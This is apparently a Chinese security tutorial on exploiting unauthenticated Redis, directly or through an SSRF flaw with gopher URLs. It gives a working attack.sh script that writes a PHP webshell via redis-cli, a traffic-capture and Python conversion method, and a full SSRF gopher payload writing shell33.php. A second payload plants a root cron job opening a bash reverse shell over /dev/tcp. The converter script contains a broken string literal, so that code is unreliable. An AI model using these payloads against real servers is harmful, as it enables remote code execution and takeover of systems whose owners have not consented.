redis利用gopher协议写shell

前言

如今redis未授权访问并不少见，而如果redis可在外网访问，那么利用方式就比较简单了，如果redis不能在外网访问，但站点存在ssrf漏洞，则redis未授权漏洞依旧可以利用。

利用

1. 外网可访问

   先说外网可访问的情况。我们直接编写脚本attack.sh

   redis-cli -h $1 -p $2 config set dir /the/web/path
   redis-cli -h $1 -p $2 config set dbfilename shell.php
   redis-cli -h $1 -p $2 set 1 ""
   redis-cli -h $1 -p $2 save
   

   直接运行脚本即可。

   chmod +x attack.sh
   ./attack.sh target_ip target_port
   

   利用这种方式不光可以写webshell,而且可以写.ssh目录。

2. ssrf+gopher

   重点讲解如何构造gopher协议payload

   • 首先须在本地构建环境（开启redis），使用socat进行端口转发

     socat -v tcp-listen:4445,fork tcp-connect:127.0.0.1:6379
     

     -v参数会显示经过socat转发的流量。

   • 接着redis客户端连接4445端口

     

   • 在socat可以看到转发的流量

     *4\r
     $6\r
     config\r
     $3\r
     set\r
     $3\r
     dir\r
     $13\r
     /var/www/html\r
     < 2020/03/28 18:58:25.929522  length=5 from=9513 to=9517
     +OK\r
     > 2020/03/28 18:58:30.152852  length=60 from=71 to=130
     *4\r
     $6\r
     config\r
     $3\r
     set\r
     $10\r
     dbfilename\r
     $11\r
     shell33.php\r
     < 2020/03/28 18:58:30.153059  length=5 from=9518 to=9522
     +OK\r
     > 2020/03/28 18:58:46.344559  length=46 from=131 to=176
     *3\r
     $3\r
     set\r
     $1\r
     1\r
     $19\r
     \r
     < 2020/03/28 18:58:46.344820  length=5 from=9523 to=9527
     +OK\r
     > 2020/03/28 18:58:48.369868  length=14 from=177 to=190
     *1\r
     $4\r
     save\r
     < 2020/03/28 18:58:48.691221  length=5 from=9528 to=9532
     +OK\r
     

     注意前面可能会有大量的流量，不用管，我们只需要截取我们需要的部分。（别被这些流量搞昏了仔细看总能看出点规律。）

   • 使用脚本转换

     #coding: utf-8
     #author: JoyChou
     import sys
     
     exp = ''
     
     with open(sys.argv[1]) as f:
         for line in f.readlines():
             if line[0] in '><+' and line[:5]!=":
                 continue
             # 判断倒数第2、3字符串是否为\r
             elif line[-3:-1] == r'\r':
                 # 如果该行只有\r，将\r替换成%0a%0d%0a
                 if len(line) == 3:
                     exp = exp + '%0a%0d%0a'
                 else:
                     line = line.replace(r'\r', '%0d%0a')
                     # 去掉最后的换行符
                     line = line.replace('\n', '')
                     exp = exp + line
             # 判断是否是空行，空行替换为%0a
             elif line == '\x0a':
                 exp = exp + '%0a'
             else:
                 line = line.replace('\n', '')
                 exp = exp + line
     print exp
     

     

   • 利用

     

     返回4个+OK说明利用成功。

   • 本地测试完成，那么直接在ssrf漏洞处执行payload

     curl -v 'http://127.0.0.1/ssrf2.php?url=gopher://127.0.0.1:6379/_*4%250D%250A$6%250D%250Aconfig%250D%250A$3%250D%250Aset%250D%250A$3%250D%250Adir%250D%250A$13%250D%250A/var/www/html%250D%250A*4%250D%250A$6%250D%250Aconfig%250D%250A$3%250D%250Aset%250D%250A$10%250D%250Adbfilename%250D%250A$11%250D%250Ashell33.php%250D%250A*3%250D%250A$3%250D%250Aset%250D%250A$1%250D%250A1%250D%250A$19%250D%250A%253C?php%2520phpinfo();%2520?%253E%250D%250A*1%250D%250A$4%250D%250Asave%250D%250A*1%250D%250A$4%250D%250Aquit%250D%250A'
     
     

     

     写入成功。

     另外也可写入定时任务

     http://127.0.0.1/ssrf2.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a
     

---

更新

工具

好吧，工具真香

https://github.com/firebroo/sec_tools

参考

• SSRF in PHP